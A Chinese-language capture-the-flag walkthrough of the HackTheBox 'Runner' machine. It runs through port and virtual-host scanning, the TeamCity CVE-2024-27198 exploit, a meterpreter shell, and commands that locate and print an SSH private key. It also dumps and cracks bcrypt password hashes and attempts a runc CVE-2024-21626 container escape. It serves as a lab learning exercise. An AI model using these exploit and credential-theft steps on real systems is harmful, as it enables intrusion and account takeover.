HackThebox Runner Walkthrough

2024-05-09 719 0

端口扫描

➜  hackthebox nmap -A -Pn 10.10.11.13 -sV -oN Runner.tcp
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-21 22:10 CST
Stats: 0:02:31 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 78.68% done; ETC: 22:13 (0:00:41 remaining)
Nmap scan report for 10.10.11.13 (10.10.11.13)
Host is up (0.35s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT      STATE    SERVICE     VERSION
22/tcp    open     ssh         OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_  256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp    open     http        nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://runner.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
981/tcp   filtered unknown
1096/tcp  filtered cnrprotocol
8000/tcp  open     nagios-nsca Nagios NSCA
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
10566/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 360.84 seconds

80 端口是一个正常的产品展示网页,这里先看看非常规的 8000 端口

Nagios Service Check Acceptor (NSCA) 是一个流行的 Nagios 插件,它允许从外部源(如应用程序、自定义脚本或第三方监控工具)向 Nagios 服务器发送被动检查结果。

查了一下 CVE 都比较老,先尝试目录扫描。

目录扫描

➜  wordlists ffuf -u http://runner.htb:8000/FUZZ -w SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt -t 50 -mc 200

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://runner.htb:8000/FUZZ
 :: Wordlist         : FUZZ: /Users/apple/tools/wordlists/SecLists/Discovery/Web-Content/raft-medium-directories-lowercase.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 50
 :: Matcher          : Response status: 200
________________________________________________

health                  [Status: 200, Size: 3, Words: 1, Lines: 2, Duration: 285ms]
version                 [Status: 200, Size: 9, Words: 1, Lines: 1, Duration: 277ms]

可惜都没有有用的信息,尝试虚拟主机爆破

虚拟主机爆破

➜  wordlists ffuf -u http://runner.htb -w SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt  -H "Host: FUZZ.runner.htb" -fw 4

        /'___\  /'___\           /'___\
       /\ \__/ /\ \__/  __  __  /\ \__/
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/
         \ \_\   \ \_\  \ \____/  \ \_\
          \/_/    \/_/   \/___/    \/_/

       v2.1.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://runner.htb
 :: Wordlist         : FUZZ: /Users/apple/tools/wordlists/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
 :: Header           : Host: FUZZ.runner.htb
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500
 :: Filter           : Response words: 4
________________________________________________

teamcity                [Status: 401, Size: 66, Words: 8, Lines: 2, Duration: 381ms]
:: Progress: [57055/57055] :: Job [1/1] :: 24 req/sec :: Duration: [0:10:07] :: Errors: 0 ::
➜  wordlists

teamcity

TeamCity 是由 JetBrains 公司开发的一款功能强大的持续集成和持续交付工具。它支持多种技术栈,包括 Java、.NET、Python 等,并且提供了一个可视化的项目管理界面,帮助团队成员直观地查看和管理所有项目,包括构建状态、测试结果、代码质量等信息

经典的 CI/CD 平台,版本比较老,先搜索 CVE。

HackThebox Runner Walkthrough插图

CVE-2024-27198

HackThebox Runner Walkthrough插图1

获取完整的 Shell

meterpreter > shell
Process 1 created.
Channel 1 created.
which python
whoami
tcuser
which python3
/usr/bin/python3
/usr/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
   Welcome to TeamCity Server Docker container

 * Installation directory: /opt/teamcity
 * Logs directory:         /opt/teamcity/logs
 * Data directory:         /data/teamcity_server/datadir

   TeamCity will be running under 'tcuser' user (1000/1000)

tcuser@647a82f29ca0:~/bin$

容器逃逸

在本机上迟迟突破不了, TeamCity 这个平台可能成为突破口。
依然是这个 CVE:https://github.com/yoryio/CVE-2024-27198

tcuser@647a82f29ca0:~/bin$ python3 CVE-2024-27198.py -t http://localhost:8111 -u xor27 -p xor27
<27198.py -t http://localhost:8111 -u xor27 -p xor27
[+] Version Found:  2023.05.3 (build 129390)
[+] Server vulnerable, returning HTTP 200
[+] New user xor27 created succesfully! Go to http://localhost:8111/login.html to login with your new credentials :)
tcuser@647a82f29ca0:~/bin$

发现 John 和 Matthew

HackThebox Runner Walkthrough插图2

这里翻到了 OpenSSH 密钥,但只能直接复制公钥。id_rsa 又是私钥的名字,我们可以尝试在服务器上查找这个文件。

HackThebox Runner Walkthrough插图3

tcuser@647a82f29ca0:~/bin$ find / -type f -name "id_rsa" 2>/dev/null
find / -type f -name "id_rsa" 2>/dev/null
/data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa
tcuser@647a82f29ca0:~/bin$ cat /data/teamcity_server/datadir/config/projects/AllProjects/pluginData/ssh_keys/id_rsa
<fig/projects/AllProjects/pluginData/ssh_keys/id_rsa
-----BEGIN OPENSSH PRIVATE KEY-----
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
KgK8c9z2ecgZsAAAALaobkBydW5uZXI=
-----END OPENSSH PRIVATE KEY-----
tcuser@647a82f29ca0:~/bin$

找到私钥(linpeas 竟然没找到,失望),利用上面两个用户名尝试 SSH。

HackThebox Runner Walkthrough插图4

权限提升

非常规的配置,值得关注。

john@runner:~$ cat /etc/fstab
# /etc/fstab: static file system information.
#
# Use 'blkid' to print the universally unique identifier for a
# device; this may be used with UUID= as a more robust way to name devices
# that works even if disks are added and removed. See fstab(5).
#
# <file system> <mount point>   <type>  <options>       <dump>  <pass>
# / was on /dev/sda2 during curtin installation
/dev/sda2 / ext4 defaults 0 1
/dev/sda3 none swap sw 0 0
proc /proc proc remount,rw,hidepid=2,noexec,nosuid,nodev 0 0
john@runner:~$

常规的提权方法都用不上,开始翻机器上安装的软件和端口。感觉突破口是容器。

john@runner:~$ netstat -ntpl
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 127.0.0.1:9443          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:8111          0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:9000          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:5005          0.0.0.0:*               LISTEN      -
tcp6       0      0 :::8000                 :::*                    LISTEN      -
tcp6       0      0 :::22                   :::*                    LISTEN      -
tcp6       0      0 :::80                   :::*                    LISTEN      -
john@runner:~$ 

john@runner:~$ ls /opt
containerd  portainer
john@runner:~$ ls /opt/containerd/
ls: cannot open directory '/opt/containerd/': Permission denied
john@runner:~$ docker -v
Docker version 25.0.3, build 4debf41

runc 本地提权,一切都刚刚好。

HackThebox Runner Walkthrough插图5

但 john 没有运行容器的权限,估计还得横向到 matthew 用户。

john@runner:~$ docker run -w /proc/self/fd/8 --name cve-2024-21626 --rm -it debian:bookworm
docker: permission denied while trying to connect to the Docker daemon socket at unix:///var/run/docker.sock: Post "http://%2Fvar%2Frun%2Fdocker.sock/v1.24/containers/create?name=cve-2024-21626": dial unix /var/run/docker.sock: connect: permission denied.
See 'docker run --help'.
john@runner:~$

还记得 opt 里的 Portainer 吗,这里可以管理容器。

Portainer 是一款开源、轻量级的 Docker 管理用户界面(UI),它基于 Docker API 构建,提供了一个直观、简便的管理界面,使得用户可以轻松地管理 Docker 容器、镜像、网络和数据卷等

端口转发

➜  Runner ssh -L 9000:127.0.0.1:9000 [email protected] -i id_rsa -fN

需要登陆,还记得 matthew 也在 teamcity 里面吗。我们可以将 teamcity 整个备份,查看数据库中的 hash。如果 matthew 密码复用了,就可以登录到 Portainer。

备份数据库

HackThebox Runner Walkthrough插图6

获取 hash

➜  Runner sudo cat database_dump/users 
Password:
ID, USERNAME, PASSWORD, NAME, EMAIL, LAST_LOGIN_TIMESTAMP, ALGORITHM
1, admin, $2a$07$neV5T/BlEDiMQUs.gM1p4uYl8xl8kvNUo4/8Aja2sAWHAQLWqufye, John, [email protected], 1714183669467, BCRYPT
2, matthew, $2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em, Matthew, [email protected], 1709150421438, BCRYPT
11, xor27, $2a$07$DyoX/HfndDKsr8W29njn8.dQZvKzMTWCCF658h5NfcqNpKNlNSSnC, , [email protected], 1714187488419, BCRYPT
12, city_adming1yo, $2a$07$6lYppJgrnezAS.RYWuZAk.Gws7egF6Z4ZzZL1G.X8WoOiPWEz2s5G, , [email protected], 1714183684615, BCRYPT
➜  Runner

hashcat crack

➜  wordlists hashcat -m3200 '$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em' rockyou.txt --force
$2a$07$q.m8WQP8niXODv55lJVovOmxGtg6K/YPHbD48/JQsdGLulmeVo.Em:piper123

CVE-2024-21626

方法:https://github.com/NitroCao/CVE-2024-21626
原理:https://nitroc.org/en/posts/cve-2024-21626-illustrated/

HackThebox Runner Walkthrough插图7


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

webpack打包站点,js文件名批量获取思路
加密对抗靶场enctypt——labs通关
【论文速读】| 注意力是实现基于大语言模型的代码漏洞定位的关键
蓝队技术——Sysmon识别检测宏病毒
内网渗透学习|powershell上线cs
LLM attack中的API调用安全问题及靶场实践

发布评论